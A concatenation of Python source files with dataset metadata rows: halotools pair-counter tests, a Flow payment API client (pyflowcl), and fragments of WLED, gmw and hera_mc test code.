        {ATTR_ENTITY_ID: entity_id, ATTR_PRESET: 1},
        blocking=True,
    )
    await hass.async_block_till_done()

    # The entity state is unchanged and the API failure is logged.
    light_state = hass.states.get(entity_id)
    assert light_state
    assert light_state.state == STATE_ON
    assert "Invalid response from API" in caplog.text
    assert mock_wled.preset.call_count == 1
    mock_wled.preset.assert_called_with(preset=1)
| 30.245347 | 86 | 0.675524 | 2,281 | 17,875 | 4.993424 | 0.07979 | 0.045654 | 0.045303 | 0.064179 | 0.836084 | 0.814135 | 0.784636 | 0.754785 | 0.742757 | 0.727392 | 0 | 0.018773 | 0.234126 | 17,875 | 590 | 87 | 30.29661 | 0.813221 | 0.024671 | 0 | 0.665347 | 0 | 0 | 0.097696 | 0.074239 | 0 | 0 | 0 | 0 | 0.213861 | 1 | 0 | false | 0 | 0.021782 | 0 | 0.021782 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5eebed31ed5f718febee91f091aead6fbdb806e8 | 16,432 | py | Python | halotools/mock_observables/pair_counters/test_pair_counters/test_marked_npairs_xy_z.py | nehapjoshi/halotools | ad9e183ee7471f7876201ce83fdc36a76e653902 | [
"BSD-3-Clause"
] | null | null | null | halotools/mock_observables/pair_counters/test_pair_counters/test_marked_npairs_xy_z.py | nehapjoshi/halotools | ad9e183ee7471f7876201ce83fdc36a76e653902 | [
"BSD-3-Clause"
] | null | null | null | halotools/mock_observables/pair_counters/test_pair_counters/test_marked_npairs_xy_z.py | nehapjoshi/halotools | ad9e183ee7471f7876201ce83fdc36a76e653902 | [
"BSD-3-Clause"
] | null | null | null | """
"""
from __future__ import (absolute_import, division, print_function, unicode_literals)
import numpy as np
import pytest
from astropy.utils.misc import NumpyRNGContext
from astropy.config.paths import _find_home
from ..pairs import xy_z_wnpairs as pure_python_weighted_pairs
from ..marked_npairs_xy_z import marked_npairs_xy_z
from ..npairs_xy_z import npairs_xy_z
from ..marked_npairs_xy_z import _func_signature_int_from_wfunc
from ....custom_exceptions import HalotoolsError
slow = pytest.mark.slow

# Shared failure message for the weight-function behavior checks below.
error_msg = ("\nThe `test_marked_npairs_wfuncs_behavior` function performs \n"
    "non-trivial checks on the returned values of marked correlation functions\n"
    "calculated on a set of points with uniform weights.\n"
    "One such check failed.\n")

__all__ = ('test_marked_npairs_xy_z_periodic', )

# Seed used so the randomly generated samples are reproducible across runs.
fixed_seed = 43

# Determine whether the machine is mine
# This will be used to select tests whose
# returned values depend on the configuration
# of my personal cache directory files
aph_home = '/Users/aphearin'
detected_home = _find_home()
# Simplified from an if/else block: a direct boolean comparison.
APH_MACHINE = (aph_home == detected_home)
def retrieve_mock_data(Npts, Npts2, Lbox):
    """Set up a regular grid of ``Npts2**3`` points to test pair counters.

    Parameters
    ----------
    Npts : int
        Unused; retained for backward compatibility with existing callers.
    Npts2 : int
        Number of grid points per dimension.
    Lbox : float
        Length of the periodic box.

    Returns
    -------
    grid_points : ndarray, shape (Npts2**3, 3)
    rp_bins : ndarray
        Fixed projected-separation bin edges [0.0, 0.1, 0.2, 0.3].
    period : ndarray, shape (3,)
        The periodic box lengths, ``[Lbox, Lbox, Lbox]``.
    """
    # Shift the last grid point slightly inside the box so that no point
    # sits exactly on the periodic boundary.
    epsilon = 0.001
    grid1d = np.linspace(0, Lbox - epsilon, Npts2)
    xx, yy, zz = np.meshgrid(grid1d, grid1d, grid1d)
    grid_points = np.vstack([xx.flatten(), yy.flatten(), zz.flatten()]).T

    rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
    period = np.array([Lbox, Lbox, Lbox])
    return grid_points, rp_bins, period
def test_marked_npairs_xy_z_periodic():
    """Compare marked_npairs_xy_z with weight_func_id=1 against the pure
    python pair counter, using periodic boundary conditions.
    """
    npts = 1000
    with NumpyRNGContext(fixed_seed):
        sample = np.random.random((npts, 3))
        marks = np.random.random((npts, 1))

    period = np.array([1.0, 1.0, 1.0])
    rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
    pi_bins = np.array([0, 0.15])

    counts = marked_npairs_xy_z(
        sample, sample, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=1)
    expected = pure_python_weighted_pairs(
        sample, sample, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks)

    assert np.allclose(expected, counts, rtol=1e-05), "pair counts are incorrect"
def test_marked_npairs_xy_z_nonperiodic():
    """Compare marked_npairs_xy_z with weight_func_id=1 against the pure
    python pair counter, without periodic boundary conditions.
    """
    npts = 1000
    with NumpyRNGContext(fixed_seed):
        sample = np.random.random((npts, 3))
        marks = np.random.random((npts, 1))

    rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
    pi_bins = np.array([0, 0.15])

    counts = marked_npairs_xy_z(
        sample, sample, rp_bins, pi_bins, period=None,
        weights1=marks, weights2=marks, weight_func_id=1)
    expected = pure_python_weighted_pairs(
        sample, sample, rp_bins, pi_bins, period=None,
        weights1=marks, weights2=marks)

    assert np.allclose(expected, counts, rtol=1e-05), "pair counts are incorrect"
@pytest.mark.skipif('not APH_MACHINE')
def test_marked_npairs_parallelization():
    """
    Function tests that marked_npairs_xy_z returns identical results when
    run serially and with 2 or 3 threads.
    """
    Npts = 1000
    with NumpyRNGContext(fixed_seed):
        random_sample = np.random.random((Npts, 3))
        ran_weights1 = np.random.random((Npts, 1))
    period = np.array([1.0, 1.0, 1.0])
    rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
    pi_bins = np.array([0, 0.15])

    serial_result = marked_npairs_xy_z(random_sample, random_sample,
        rp_bins, pi_bins, period=period, weights1=ran_weights1,
        weights2=ran_weights1, weight_func_id=1)
    parallel_result2 = marked_npairs_xy_z(random_sample, random_sample,
        rp_bins, pi_bins, period=period, weights1=ran_weights1,
        weights2=ran_weights1, weight_func_id=1, num_threads=2)
    # Renamed from the misleading ``parallel_result7``: this call uses
    # num_threads=3.
    parallel_result3 = marked_npairs_xy_z(random_sample, random_sample,
        rp_bins, pi_bins, period=period, weights1=ran_weights1,
        weights2=ran_weights1, weight_func_id=1, num_threads=3)

    assert np.allclose(serial_result, parallel_result2, rtol=1e-05), \
        "pair counts are incorrect"
    assert np.allclose(serial_result, parallel_result3, rtol=1e-05), \
        "pair counts are incorrect"
@slow
def test_marked_npairs_3d_wfuncs_signatures():
    """
    Loop over all wfuncs and ensure that the wfunc signature is handled
    correctly: a weights array of the expected width is accepted, while one
    column too wide raises HalotoolsError.
    """
    Npts = 1000
    with NumpyRNGContext(fixed_seed):
        random_sample = np.random.random((Npts, 3))
    rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
    pi_bins = np.array([0, 0.15])
    rmax = rp_bins.max()
    period = np.array([1.0, 1.0, 1.0])

    # Determine how many wfuncs have currently been implemented by probing
    # until the signature lookup raises.
    wfunc_index = 1
    while True:
        try:
            _func_signature_int_from_wfunc(wfunc_index)
            wfunc_index += 1
        except HalotoolsError:
            break
    # Fix: the count is a plain int; ``np.copy`` needlessly wrapped it in
    # a 0-d array.
    num_wfuncs = wfunc_index

    # Now loop over all available weight_func_id indices
    for wfunc_index in range(1, num_wfuncs):
        signature = _func_signature_int_from_wfunc(wfunc_index)
        with NumpyRNGContext(fixed_seed):
            weights = np.random.random(Npts*signature).reshape(Npts, signature) - 0.5
        # A correctly shaped weights array must be accepted.
        marked_npairs_xy_z(random_sample, random_sample, rp_bins, pi_bins,
            period=period, weights1=weights, weights2=weights,
            weight_func_id=wfunc_index, approx_cell1_size=[rmax, rmax, rmax])

        # One extra weights column must be rejected.
        with pytest.raises(HalotoolsError):
            signature = _func_signature_int_from_wfunc(wfunc_index) + 1
            with NumpyRNGContext(fixed_seed):
                weights = np.random.random(Npts*signature).reshape(Npts, signature) - 0.5
            marked_npairs_xy_z(random_sample, random_sample, rp_bins, pi_bins,
                period=period, weights1=weights, weights2=weights,
                weight_func_id=wfunc_index)
@slow
def test_marked_npairs_behavior_weight_func_id1():
    """
    Verify the behavior of weight_func_id=1 by comparing pure python,
    unmarked pairs to the returned result from a uniformly weighted set of
    points: marks of 3 on every point should scale the counts by 9.
    """
    Npts, Npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    # wfunc = 1
    weights = np.ones(Npts)*3
    result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins,
        period=period, weights1=weights, weights2=weights, weight_func_id=1,
        approx_cell1_size=[rmax, rmax, rmax])

    test_result = pure_python_weighted_pairs(grid_points, grid_points,
        rp_bins, pi_bins, period=period,
        weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)))

    # Consistency fix: this assert now carries error_msg like its siblings.
    assert np.all(result == 9.*test_result), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id2():
    """Check weight_func_id=2 on a uniform grid: with marks of 3 on every
    point, the result is 6x the unweighted pure python pair counts.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    uniform = np.ones((npts, 1))
    unweighted = pure_python_weighted_pairs(
        grid_points, grid_points, rp_bins, pi_bins,
        weights1=uniform, weights2=uniform, period=period)

    # wfunc = 2
    marks = np.ones(npts) * 3
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=2,
        approx_cell1_size=[rmax, rmax, rmax])

    assert np.all(counts == 6. * unweighted), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id3():
    """Check weight_func_id=3 on a uniform grid: mark columns (2, 3) give
    9x the unweighted counts; swapping the columns gives 4x.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])
    cell_size = [rmax, rmax, rmax]

    uniform = np.ones((npts, 1))
    unweighted = pure_python_weighted_pairs(
        grid_points, grid_points, rp_bins, pi_bins,
        weights1=uniform, weights2=uniform, period=period)

    # wfunc = 3
    twos = np.ones(npts) * 2
    threes = np.ones(npts) * 3

    marks = np.vstack([twos, threes]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=3,
        approx_cell1_size=cell_size)
    assert np.all(counts == 9. * unweighted), error_msg

    marks = np.vstack([threes, twos]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=3,
        approx_cell1_size=cell_size)
    assert np.all(counts == 4. * unweighted), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id4():
    """Check weight_func_id=4 on a uniform grid: with identical (2, 3)
    marks on every point, all pair counts are zero.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    # wfunc = 4
    marks = np.vstack([np.ones(npts) * 2, np.ones(npts) * 3]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=4,
        approx_cell1_size=[rmax, rmax, rmax])

    assert np.all(counts == 0), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id5():
    """Check weight_func_id=5 on a uniform grid: with identical (2, 3)
    marks on every point, all pair counts are zero.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    # wfunc = 5
    marks = np.vstack([np.ones(npts) * 2, np.ones(npts) * 3]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=5,
        approx_cell1_size=[rmax, rmax, rmax])

    assert np.all(counts == 0), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id6():
    """Check weight_func_id=6 on a uniform grid: with identical (2, 3)
    marks on every point, all pair counts are zero.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    # wfunc = 6
    marks = np.vstack([np.ones(npts) * 2, np.ones(npts) * 3]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=6,
        approx_cell1_size=[rmax, rmax, rmax])

    assert np.all(counts == 0), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id7():
    """Check weight_func_id=7 on a uniform grid: mark columns (1, -1) on
    every point negate the unweighted pure python pair counts.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    uniform = np.ones((npts, 1))
    unweighted = pure_python_weighted_pairs(
        grid_points, grid_points, rp_bins, pi_bins,
        weights1=uniform, weights2=uniform, period=period)

    # wfunc = 7
    marks = np.vstack([np.ones(npts), np.zeros(npts) - 1]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=7,
        approx_cell1_size=[rmax, rmax, rmax])

    assert np.all(counts == -unweighted), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id8():
    """Check weight_func_id=8 on a uniform grid: mark columns (1, 3) on
    every point give 3x the unweighted pure python pair counts.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    uniform = np.ones((npts, 1))
    unweighted = pure_python_weighted_pairs(
        grid_points, grid_points, rp_bins, pi_bins,
        weights1=uniform, weights2=uniform, period=period)

    # wfunc = 8
    marks = np.vstack([np.ones(npts), np.ones(npts) * 3]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=8,
        approx_cell1_size=[rmax, rmax, rmax])

    assert np.all(counts == 3 * unweighted), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id9():
    """Check weight_func_id=9 on a uniform grid: mark columns (1, 3) on
    every point give 3x the unweighted pure python pair counts.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])

    uniform = np.ones((npts, 1))
    unweighted = pure_python_weighted_pairs(
        grid_points, grid_points, rp_bins, pi_bins,
        weights1=uniform, weights2=uniform, period=period)

    # wfunc = 9
    marks = np.vstack([np.ones(npts), np.ones(npts) * 3]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=9,
        approx_cell1_size=[rmax, rmax, rmax])

    assert np.all(counts == 3 * unweighted), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id10():
    """Check weight_func_id=10 on a uniform grid: mark columns (1, 3) give
    all-zero counts, while (1, -3) gives -3x the unweighted counts.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    rmax = rp_bins.max()
    pi_bins = np.array([0, 0.15])
    cell_size = [rmax, rmax, rmax]

    uniform = np.ones((npts, 1))
    unweighted = pure_python_weighted_pairs(
        grid_points, grid_points, rp_bins, pi_bins,
        weights1=uniform, weights2=uniform, period=period)

    # wfunc = 10
    marks = np.vstack([np.ones(npts), np.ones(npts) * 3]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=10,
        approx_cell1_size=cell_size)
    assert np.all(counts == 0), error_msg

    marks = np.vstack([np.ones(npts), -np.ones(npts) * 3]).T
    counts = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks, weights2=marks, weight_func_id=10,
        approx_cell1_size=cell_size)
    assert np.all(counts == -3 * unweighted), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id11():
    """Check weight_func_id=11: mark columns (1, 0) vs all-ones reproduce
    the unweighted npairs_xy_z counts; doubling the second mark column of
    sample 2 doubles the counts.
    """
    npts, npts2 = 1000, 10
    grid_points, rp_bins, period = retrieve_mock_data(npts, npts2, 1)
    pi_bins = np.array([0, 0.15])

    marks1 = np.tile((1., 0.), npts).reshape((npts, 2))
    marks2 = np.ones(npts * 2).reshape((npts, 2))
    weighted = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks1, weights2=marks2, weight_func_id=11)
    unweighted = npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins,
        period=period)
    assert np.all(weighted == unweighted)

    marks2 = np.tile((1., 2.), npts).reshape((npts, 2))
    doubled = marked_npairs_xy_z(
        grid_points, grid_points, rp_bins, pi_bins, period=period,
        weights1=marks1, weights2=marks2, weight_func_id=11)
    assert np.all(doubled == 2 * unweighted)
| 36.515556 | 99 | 0.702532 | 2,448 | 16,432 | 4.468137 | 0.09518 | 0.032364 | 0.037301 | 0.049735 | 0.838819 | 0.828396 | 0.795118 | 0.781313 | 0.765771 | 0.764034 | 0 | 0.039073 | 0.188535 | 16,432 | 449 | 100 | 36.596882 | 0.781236 | 0.140093 | 0 | 0.609665 | 0 | 0 | 0.027238 | 0.004913 | 0 | 0 | 0 | 0 | 0.066915 | 1 | 0.05948 | false | 0 | 0.037175 | 0 | 0.100372 | 0.003717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6f0c7df8e8fe2f993ea5e7f91edeae403f6463af | 35 | py | Python | gmw/__init__.py | mattbit/gmw | 5cc215826e78043eeb11af96ea8f43471177d9f1 | [
"MIT"
] | 1 | 2021-02-28T03:21:51.000Z | 2021-02-28T03:21:51.000Z | gmw/__init__.py | mattbit/gmw | 5cc215826e78043eeb11af96ea8f43471177d9f1 | [
"MIT"
] | null | null | null | gmw/__init__.py | mattbit/gmw | 5cc215826e78043eeb11af96ea8f43471177d9f1 | [
"MIT"
] | null | null | null | from .wavelets import MorseWavelet
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6f4aab55daf450a351144367c40c39dba8361d90 | 6,512 | py | Python | pyflowcl/Payment.py | mariofix/pyflowcl | 853ba83b892cc0c5cd90e81eb17ef435a73100e4 | [
"MIT"
] | 2 | 2020-12-07T20:50:30.000Z | 2021-02-08T23:31:07.000Z | pyflowcl/Payment.py | mariofix/pyflowcl | 853ba83b892cc0c5cd90e81eb17ef435a73100e4 | [
"MIT"
] | 6 | 2020-08-31T03:11:21.000Z | 2022-01-17T02:54:04.000Z | pyflowcl/Payment.py | mariofix/pyflowcl | 853ba83b892cc0c5cd90e81eb17ef435a73100e4 | [
"MIT"
] | null | null | null | from dataclasses import asdict
from typing import Any, Dict, Union, cast
from .Clients import ApiClient
import logging
from .models import *
def getStatus(
    apiclient: ApiClient,
    token: str,
) -> Union[PaymentStatus, Error,]:
    """Fetch the status of a previously created payment.

    The ``token`` parameter is the notification id, received after a
    payment has been processed.

    Args:
        apiclient: Configured Flow API client.
        token: Payment token (notification id) identifying the transaction.

    Returns:
        ``PaymentStatus`` on HTTP 200, or ``Error`` on HTTP 400/401.

    Raises:
        Exception: For any other, unexpected HTTP status code.
    """
    url = f"{apiclient.api_url}/payment/getStatus"
    params: Dict[str, Any] = {"apiKey": apiclient.api_key, "token": token}
    # Sign the request over the parameters, then attach the signature.
    params["s"] = apiclient.make_signature(params)
    logging.debug("Before Request: %s", params)

    response = apiclient.get(url, params)
    if response.status_code == 200:
        return PaymentStatus.from_dict(cast(Dict[str, Any], response.json()))
    if response.status_code in (400, 401):
        return Error.from_dict(cast(Dict[str, Any], response.json()))
    # Bug fix: ``raise Exception(response=response)`` raised a TypeError
    # because BaseException accepts no keyword arguments.
    raise Exception(f"Unexpected Flow API response: {response.status_code}")
def getStatusByCommerceId(
    apiclient: ApiClient,
    commerceId: str,
) -> Union[PaymentStatus, Error,]:
    """Fetch the status of a previously created payment by commerce order id.

    Args:
        apiclient: Configured Flow API client.
        commerceId: The merchant's own order identifier for the payment.

    Returns:
        ``PaymentStatus`` on HTTP 200, or ``Error`` on HTTP 400/401.

    Raises:
        Exception: For any other, unexpected HTTP status code.
    """
    url = f"{apiclient.api_url}/payment/getStatusByCommerceId"
    params: Dict[str, Any] = {"apiKey": apiclient.api_key, "commerceId": commerceId}
    # Sign the request over the parameters, then attach the signature.
    params["s"] = apiclient.make_signature(params)
    logging.debug("Before Request: %s", params)

    response = apiclient.get(url, params)
    if response.status_code == 200:
        return PaymentStatus.from_dict(cast(Dict[str, Any], response.json()))
    if response.status_code in (400, 401):
        return Error.from_dict(cast(Dict[str, Any], response.json()))
    # Bug fix: ``raise Exception(response=response)`` raised a TypeError
    # because BaseException accepts no keyword arguments.
    raise Exception(f"Unexpected Flow API response: {response.status_code}")
def getStatusByFlowOrder(
    apiclient: ApiClient,
    flowOrder: int,
) -> Union[PaymentStatus, Error,]:
    """Fetch the status of a previously created payment by Flow order number.

    Args:
        apiclient: Configured Flow API client.
        flowOrder: The Flow order number assigned to the payment.

    Returns:
        ``PaymentStatus`` on HTTP 200, or ``Error`` on HTTP 400/401.

    Raises:
        Exception: For any other, unexpected HTTP status code.
    """
    url = f"{apiclient.api_url}/payment/getStatusByFlowOrder"
    params: Dict[str, Any] = {"apiKey": apiclient.api_key, "flowOrder": flowOrder}
    # Sign the request over the parameters, then attach the signature.
    params["s"] = apiclient.make_signature(params)
    logging.debug("Before Request: %s", params)

    response = apiclient.get(url, params)
    if response.status_code == 200:
        return PaymentStatus.from_dict(cast(Dict[str, Any], response.json()))
    if response.status_code in (400, 401):
        return Error.from_dict(cast(Dict[str, Any], response.json()))
    # Bug fix: ``raise Exception(response=response)`` raised a TypeError
    # because BaseException accepts no keyword arguments.
    raise Exception(f"Unexpected Flow API response: {response.status_code}")
def getPayments(
    apiclient: ApiClient, payment_info: Dict[str, Any]
) -> Union[PaymentList, Error,]:
    """Fetch the paginated list of payments received in one day.

    The payment objects in the list have the same structure as those
    returned by the ``payment/getStatus`` services.

    Args:
        apiclient: Configured Flow API client.
        payment_info: Query parameters (e.g. date, pagination fields).
            The dict is no longer mutated by this call.

    Returns:
        ``PaymentList`` on HTTP 200, or ``Error`` on HTTP 400/401.

    Raises:
        Exception: For any other, unexpected HTTP status code.
    """
    url = f"{apiclient.api_url}/payment/getPayments"
    # Work on a copy so the caller's dict is not polluted with apiKey/s.
    params: Dict[str, Any] = dict(payment_info)
    params["apiKey"] = apiclient.api_key
    params["s"] = apiclient.make_signature(params)
    logging.debug("Before Request: %s", params)

    response = apiclient.get(url, params)
    if response.status_code == 200:
        return PaymentList.from_dict(cast(Dict[str, Any], response.json()))
    if response.status_code in (400, 401):
        return Error.from_dict(cast(Dict[str, Any], response.json()))
    # Bug fix: ``raise Exception(response=response)`` raised a TypeError
    # because BaseException accepts no keyword arguments.
    raise Exception(f"Unexpected Flow API response: {response.status_code}")
def create(
    apiclient: ApiClient, payment_data: Dict[str, Any]
) -> Union[PaymentResponse, Error,]:
    """Create a payment order in Flow.

    The response contains the URL to redirect the payer's browser to, and
    the token identifying the transaction. The redirect URL is formed by
    concatenating ``url + "?token=" + token``. Once the payer completes
    the payment, Flow notifies the result to the merchant page given in
    the ``urlConfirmation`` parameter.

    Args:
        apiclient: Configured Flow API client.
        payment_data: Fields of the payment request (see PaymentRequest).

    Returns:
        ``PaymentResponse`` on HTTP 200, or ``Error`` on HTTP 400/401.

    Raises:
        Exception: For any other, unexpected HTTP status code.
    """
    url = f"{apiclient.api_url}/payment/create"
    payment = PaymentRequest.from_dict(payment_data)
    if payment.apiKey is None:
        payment.apiKey = apiclient.api_key
    payment.s = apiclient.make_signature(asdict(payment))
    logging.debug("Before Request: %s", payment)

    response = apiclient.post(url, asdict(payment))
    if response.status_code == 200:
        return PaymentResponse.from_dict(cast(Dict[str, Any], response.json()))
    if response.status_code in (400, 401):
        return Error.from_dict(cast(Dict[str, Any], response.json()))
    # Bug fix: ``raise Exception(response=response)`` raised a TypeError
    # because BaseException accepts no keyword arguments.
    raise Exception(f"Unexpected Flow API response: {response.status_code}")
def createEmail(
    apiclient: ApiClient, payment_data: Dict[str, Any]
) -> Union[PaymentResponse, Error,]:
    """Create a payment order collected by email.

    Flow sends the payer an email containing the payment-order information
    and the corresponding payment link. Once the payer completes the
    payment, Flow notifies the result to the merchant page given in the
    ``urlConfirmation`` parameter.

    Args:
        apiclient: Configured Flow API client.
        payment_data: Fields of the payment request (see PaymentRequestEmail).

    Returns:
        ``PaymentResponse`` on HTTP 200, or ``Error`` on HTTP 400/401.

    Raises:
        Exception: For any other, unexpected HTTP status code.
    """
    url = f"{apiclient.api_url}/payment/createEmail"
    payment = PaymentRequestEmail.from_dict(payment_data)
    if payment.apiKey is None:
        payment.apiKey = apiclient.api_key
    payment.s = apiclient.make_signature(asdict(payment))
    logging.debug("Before Request: %s", payment)

    response = apiclient.post(url, asdict(payment))
    if response.status_code == 200:
        return PaymentResponse.from_dict(cast(Dict[str, Any], response.json()))
    if response.status_code in (400, 401):
        return Error.from_dict(cast(Dict[str, Any], response.json()))
    # Bug fix: ``raise Exception(response=response)`` raised a TypeError
    # because BaseException accepts no keyword arguments.
    raise Exception(f"Unexpected Flow API response: {response.status_code}")
| 37 | 84 | 0.694564 | 842 | 6,512 | 5.293349 | 0.166271 | 0.037694 | 0.053848 | 0.080772 | 0.740857 | 0.740857 | 0.726946 | 0.71842 | 0.693516 | 0.693516 | 0 | 0.010309 | 0.195639 | 6,512 | 175 | 85 | 37.211429 | 0.840588 | 0.208231 | 0 | 0.705357 | 0 | 0 | 0.077476 | 0.049121 | 0 | 0 | 0 | 0.011429 | 0 | 1 | 0.053571 | false | 0 | 0.044643 | 0 | 0.258929 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6f6f9df33c0be06e2498a7f7fffffd1be19c129a | 92,164 | py | Python | hera_mc/tests/test_correlator.py | HERA-Team/hera_mc | bc4d57e5e9c5ac8cd2a5b1a356de1742c2f70d8e | [
"BSD-2-Clause"
] | 4 | 2018-01-28T06:58:00.000Z | 2020-04-16T11:19:38.000Z | hera_mc/tests/test_correlator.py | HERA-Team/hera_mc | bc4d57e5e9c5ac8cd2a5b1a356de1742c2f70d8e | [
"BSD-2-Clause"
] | 474 | 2016-10-26T17:29:54.000Z | 2022-02-15T21:51:52.000Z | hera_mc/tests/test_correlator.py | HERA-Team/hera_mc | bc4d57e5e9c5ac8cd2a5b1a356de1742c2f70d8e | [
"BSD-2-Clause"
] | 2 | 2016-11-15T14:34:55.000Z | 2020-11-02T08:07:19.000Z | # -*- mode: python; coding: utf-8 -*-
# Copyright 2018 the HERA Collaboration
# Licensed under the 2-clause BSD license.
"""Testing for `hera_mc.correlator`."""
import os
import copy
import time
import datetime
import hashlib
from math import floor
import pytest
import yaml
import numpy as np
from astropy.time import Time, TimeDelta
from hera_mc import mc, cm_partconnect
import hera_mc.correlator as corr
from hera_mc.data import DATA_PATH
from ..tests import onsite, checkWarnings, requires_redis, TEST_DEFAULT_REDIS_HOST
@pytest.fixture(scope='module')
def corrcommand():
    """Example correlator command states, keyed by command name."""
    # (state, unix timestamp) per command; expanded into the dict shape
    # expected by the tests.
    raw_states = {
        'taking_data': (True, 1512770942),
        'phase_switching': (False, 1512770944),
        'noise_diode': (True, 1512770946),
    }
    return {
        name: {'state': state, 'timestamp': Time(unix_sec, format='unix')}
        for name, (state, unix_sec) in raw_states.items()
    }
@pytest.fixture(scope='module')
def corrstate_nonetime():
    # Correlator state entry whose timestamp is None (never set).
    return {'taking_data': {'state': False, 'timestamp': None}}
@pytest.fixture(scope='module')
def feng_config():
    """Load the example F-engine config; yields (file path, parsed dict)."""
    config_file = os.path.join(
        DATA_PATH, 'test_data', 'hera_feng_config_example.yaml')
    with open(config_file, 'r') as fh:
        parsed = yaml.safe_load(fh)
    return config_file, parsed
@pytest.fixture(scope='module')
def corr_config():
    """Load the example correlator config; yields (file path, parsed dict)."""
    config_file = os.path.join(
